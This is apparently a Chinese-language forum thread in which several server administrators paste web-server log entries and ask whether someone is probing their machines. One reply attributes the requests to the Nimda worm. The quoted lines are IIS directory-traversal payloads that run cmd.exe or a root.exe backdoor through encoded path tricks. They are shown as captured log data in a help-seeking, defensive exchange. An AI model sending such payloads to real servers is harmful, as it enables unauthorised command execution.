|
f******g 发帖数: 111 | 2 xx.xxx.188.29 - - [23/Jun/2002:05:41:17 -0500] "GET
/scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -
xxx.xxx.16.30 - - [23/Jun/2002:06:42:52 -0500] "GET
/scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -
感觉好象很怪异。
是有人在试探什么么? |
|
k**n 发帖数: 307 | 3 有个IP不停的向我的server发这样的信号:
(从httpd log里看见的)
"GET /scripts/root.exe?/c+dir HTTP/1.0"
"GET /MSADC/root.exe?/c+dir HTTP/1.0"
"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
"GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
"GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
"GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
等等等等. |
|
b*********l 发帖数: 30 | 4 Nimda worm trying to infect your machine and LAN (if not already) ...
/scripts/root.exe?/c+dir
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/syst |
|
S*****T 发帖数: 400 | 5 【 以下文字转载自 Linux 讨论区 】
【 原文由 susygut 所发表 】
www.dynamixcorp.com - - [01/Dec/2003:03:13:21 -0600] "SEARCH / HTTP/1.1" 405
342 "-" "-"
asp.kyokuto.co.jp - - [01/Dec/2003:03:34:03 -0600] "GET /scripts/..%255c%255c.
./winnt/system32/cmd.exe?/c+dir" 404 357 "-" "-"
这是httpd的logs文件里一条
这什么意思啊
这家伙想控制我的机器?
难道windows的server这么容易就被搞了?
ft啊
我开了sendmail, sshd和httpd的
当然也有firewall
需要注意什么吗
请各位精通网络安全的大侠指教指教 |
|
|